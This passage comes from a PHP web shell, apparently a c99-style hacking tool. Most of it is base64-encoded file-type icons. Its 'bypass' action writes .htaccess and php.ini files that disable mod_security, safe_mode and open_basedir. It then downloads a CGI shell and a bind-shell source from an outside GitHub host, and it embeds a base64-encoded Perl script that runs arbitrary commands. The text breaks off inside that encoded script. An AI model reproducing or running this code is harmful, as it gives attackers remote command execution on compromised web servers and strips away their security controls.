2928 "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2929 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
2930 "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
2931 "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
2932 "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
2933 "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
2934 "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
2935 "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
2936 "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
2937 "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
2938 "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
2939 "mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
2940 "zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
2941 "AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
2942 "sql_button_insert"=>
2943 "R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
2944 "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2945 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
2946 "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
2947 "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
2948 "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
2949 "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
2950 "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
2951 "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
2952 "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
2953 "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
2954 "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
2955 "mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
2956 "zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
2957 "AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
2958 "up"=>
2959 "R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
2960 "AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
2961 "+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV".
2962 "IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
2963 "write"=>
2964 "R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
2965 "AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
2966 "EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
2967 "LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
2968 "ext_asp"=>
2969 "R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
2970 "/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
2971 "D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
2972 "ext_mp3"=>
2973 "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
2974 "aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
2975 "IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
2976 "ext_avi"=>
2977 "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
2978 "WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
2979 "PYXCyg+V2i44XeRmSfYqsGhAAgA7",
2980 "ext_cgi"=>
2981 "R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
2982 "DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
2983 "LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
2984 "Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
2985 "Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2986 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2987 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2988 "AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".
2989 "BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".
2990 "AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".
2991 "RYtMAgEAOw==",
2992 "ext_cmd"=>
2993 "R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
2994 "eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
2995 "dmrYAMn1onq/YKpjvEgAADs=",
2996 "ext_cpp"=>
2997 "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
2998 "WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
2999 "Eq7YrLDE7a4SADs=",
3000 "ext_ini"=>
3001 "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
3002 "aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
3003 "SnEjgPVarHEHgrB43JvszsQEADs=",
3004 "ext_diz"=>
3005 "R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
3006 "/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
3007 "/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
3008 "/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
3009 "/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
3010 "pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
3011 "dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
3012 "9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
3013 "4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3014 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3015 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3016 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3017 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3018 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3019 "AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
3020 "C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
3021 "2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
3022 "CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
3023 "Ow==",
3024 "ext_doc"=>
3025 "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
3026 "WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
3027 "MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
3028 "ext_exe"=>
3029 "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
3030 "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
3031 "xhIAOw==",
3032 "ext_h"=>
3033 "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
3034 "WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
3035 "Wq/NknbbSgAAOw==",
3036 "ext_hpp"=>
3037 "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
3038 "WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
3039 "UqUagnbLdZa+YFcCADs=",
3040 "ext_htaccess"=>
3041 "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
3042 "WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
3043 "AAA7",
3044 "ext_html"=>
3045 "R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
3046 "c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
3047 "KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
3048 "Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
3049 "ADs=",
3050 "ext_jpg"=>
3051 "R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
3052 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
3053 "Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
3054 "FxEAOw==",
3055 "ext_js"=>
3056 "R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
3057 "k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
3058 "a00AjYYBbc/o9HjNniUAADs=",
3059 "ext_lnk"=>
3060 "R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
3061 "NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
3062 "Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
3063 "AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
3064 "MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
3065 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3066 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3067 "AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
3068 "NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
3069 "1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
3070 "ADs=",
3071 "ext_log"=>
3072 "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
3073 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
3074 "zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
3075 "ext_php"=>
3076 "R0lGODlhEAAQAIABAAAAAP///ywAAAAAEAAQAAACJkQeoMua1tBxqLH37HU6arxZYLdIZMmd0Oqp".
3077 "aGeyYpqJlRG/rlwAADs=",
3078 "ext_pl"=>
3079 "R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
3080 "GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
3081 "ext_swf"=>
3082 "R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
3083 "nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
3084 "ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
3085 "GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
3086 "NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
3087 "ext_tar"=>
3088 "R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
3089 "Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
3090 "HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
3091 "UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
3092 "uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3093 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3094 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3095 "AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
3096 "GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
3097 "HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
3098 "u4tLAgEAOw==",
3099 "ext_txt"=>
3100 "R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
3101 "SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
3102 "UpPWG3Ig6Hq/XmRjuZwkAAA7",
3103 "ext_wri"=>
3104 "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
3105 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
3106 "a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
3107 "ext_xml"=>
3108 "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
3109 "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3110 "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
3111 "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
3112 "IQA7"
3113 );
3114//Untuk optimalisasi ukuran dan kecepatan.
3115 $imgequals = array(
3116 "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
3117 "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
3118 "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
3119 "ext_html"=>array("ext_html","ext_htm"),
3120 "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
3121 "ext_lnk"=>array("ext_lnk","ext_url"),
3122 "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
3123 "ext_doc"=>array("ext_doc","ext_dot"),
3124 "ext_js"=>array("ext_js","ext_vbs"),
3125 "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
3126 "ext_wri"=>array("ext_wri","ext_rtf"),
3127 "ext_swf"=>array("ext_swf","ext_fla"),
3128 "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
3129 "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
3130 );
3131 if (!$getall) {
3132 header("Content-type: image/gif");
3133 header("Cache-control: public");
3134 header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
3135 header("Cache-control: max-age=".(60*60*24*7));
3136 header("Last-Modified: ".date("r",filemtime(__FILE__)));
3137 foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
3138 if (empty($images[$img])) {$img = "small_unk";}
3139 if (in_array($img,$ext_tar)) {$img = "ext_tar";}
3140 echo base64_decode($images[$img]);
3141 }
3142 else {
3143 foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
3144 natsort($images);
3145 $k = array_keys($images);
3146 echo "<center>";
3147 foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
3148 echo "</center>";
3149 }
3150 exit;
3151}
3152if ($act == "bypass") {
3153 @mkdir('bypass');
3154 $fp2 = fopen(".htaccess","w+");
3155 fwrite($fp2,"Options +FollowSymLinks
3156<IfModule mod_security.c>
3157 SecFilterEngine Off
3158 SecFilterScanPOST Off
3159</IfModule>");
3160
3161 $fp = fopen("php.ini","w+");
3162 fwrite($fp,"safe_mode = Off
3163disable_functions = NONE
3164safe_mode_gid = OFF
3165open_basedir = OFF ");
3166
3167 echo "<b>.: Select Bypass Tool :.</b></br>
3168<form method='POST' > <p>
3169<select name='bypass_type'>
3170<option value='Cmd_Run'>Cmd Run</option>
3171<option value='Cgi_Shell'>Cgi Shell</option>
3172<option value='Python_Shell'>Python Shell</option>
3173</select>
3174<input type='submit' value='Go ' />
3175</p></form>";
3176 $zh_cih = $_POST['bypass_type'];
3177 switch ($zh_cih) {
3178 case "Cgi_Shell":
3179 @mkdir('bypass/cgishell', 0755);
3180 chdir('bypass/cgishell');
3181 $cih = ".htaccess";
3182 $cih_note = "$cih";
3183 $zh = fopen ($cih_note , 'w') or die ("zh açılamadı!");
3184 $htcss = "Options FollowSymLinks MultiViews Indexes ExecCGI
3185
3186AddType application/x-httpd-cgi .cih
3187
3188AddHandler cgi-script .cih
3189AddHandler cgi-script .cih";
3190 fwrite ( $zh , $htcss ) ;
3191 fclose ($zh);
3192 $cgishellcih=file_get_contents('https://raw.githubusercontent.com/CiH777/bypass/master/cgi');
3193 $file = fopen("cihtelnet.cih" ,"w+");
3194 $write = fwrite ($file ,$cgishellcih);
3195 fclose($file);
3196 chmod("cihtelnet.cih",0755);
3197 $cihbind=file_get_contents('https://raw.githubusercontent.com/CiH777/bypass/master/cihbind');
3198 $file = fopen("cihbind.c" ,"w+");
3199 $write = fwrite ($file ,$cihbind);
3200 fclose($file);
3201
3202 echo "</br><a href='bypass/cgishell/cihtelnet.cih' target='_blank'> Go To [Cgi Shell] </a>";
3203 break;
3204
3205 case "Cmd_Run":
3206 @mkdir('bypass/cmdrun', 0755);
3207 chdir('bypass/cmdrun');
3208 $cih = ".htaccess";
3209 $cih_note = "$cih";
3210 $cih = fopen ($cih_note , 'w') or die ("zh açılamadı!");
3211 $htcss = "AddHandler cgi-script .cih";
3212 fwrite ( $zh , $htcss ) ;
3213 fclose ($zh);
3214 $cmdcih = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWFpbg0KIw0KIyBQZXJsS2l0LTAuMSAt
3215IFtEb2FyIHVzZXJpaSBpbnJlZ2lzdHJhdGkgcG90IHZlZGVhIGxpbmt1cmlsZS4gXQ0KIw0KIyBj
3216bWQucGw6IFJ1biBjb21tYW5kcyBvbiBhIHdlYnNlcnZlcg0KDQp1c2Ugc3RyaWN0Ow0KDQpteSAo
3217JGNtZCwgJUZPUk0pOw0KDQokfD0xOw0KDQpwcmludCAiQ29udGVudC1UeXBlOiB0ZXh0L2h0bWxc
3218clxuIjsNCnByaW50ICJcclxuIjsNCg0KIyBHZXQgcGFyYW1ldGVycw0KDQolRk9STSA9IHBhcnNl
3219X3BhcmFtZXRlcnMoJEVOVnsnUVVFUllfU1RSSU5HJ30pOw0KDQppZihkZWZpbmVkICRGT1JNeydj
3220bWQnfSkgew0KICAkY21kID0gJEZPUk17J2NtZCd9Ow0KfQ0KDQpwcmludCAnPEhUTUw+DQo8Ym9k
3221eT4NCjxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9IkdFVCI+DQo8aW5wdXQgdHlwZT0idGV4dCIgbmFt
3222ZT0iY21kIiBzaXplPTQ1IHZhbHVlPSInIC4gJGNtZCAuICciPg0KPGlucHV0IHR5cGU9InN1Ym1p
3223dCIgdmFsdWU9IlJ1biI+DQo8L2Zvcm0+DQo8cHJlPic7DQoNCmlmKGRlZmluZWQgJEZPUk17J2Nt
3224ZCd9KSB7DQogIHByaW50ICJSZXN1bHRzIG9mICckY21kJyBleGVjdXRpb246XG5cbiI7DQogIHBy
3225aW50ICItIng4MDsNCiAgcHJpbnQgIlxuIjsNCg0KICBvcGVuKENNRCwgIigkY21kKSAyPiYxIHwi
3226KSB8fCBwcmludCAiQ291bGQgbm90IGV4ZWN1dGUgY29tbWFuZCI7DQoNCiAgd2hpbGUoPENNRD4p
3227IHsNCiAgICBwcmludDsNCiAgfQ0KDQogIGNsb3NlKENNRCk7DQogIHByaW50ICItIng4MDsNCiAg
3228cHJpbnQgIlxuIjsNCn0NCg0KcHJpbnQgIjwvcHJlPiI7DQoNCnN1YiBwYXJzZV9wYXJhbWV0ZXJz
3229ICgkKSB7DQogIG15ICVyZXQ7DQoNCiAgbXkgJGlucHV0ID0gc2hpZnQ7DQoNCiAgZm9yZWFjaCBt
3230eSAkcGFpciAoc3BsaXQoJyYnLCAkaW5wdXQpKSB7DQogICAgbXkgKCR2YXIsICR2YWx1ZSkgPSBz
3231cGxpdCgnPScsICRwYWlyLCAyKTsNCiAgICANCiAgICBpZigkdmFyKSB7DQogICAgICAkdmFsdWUg
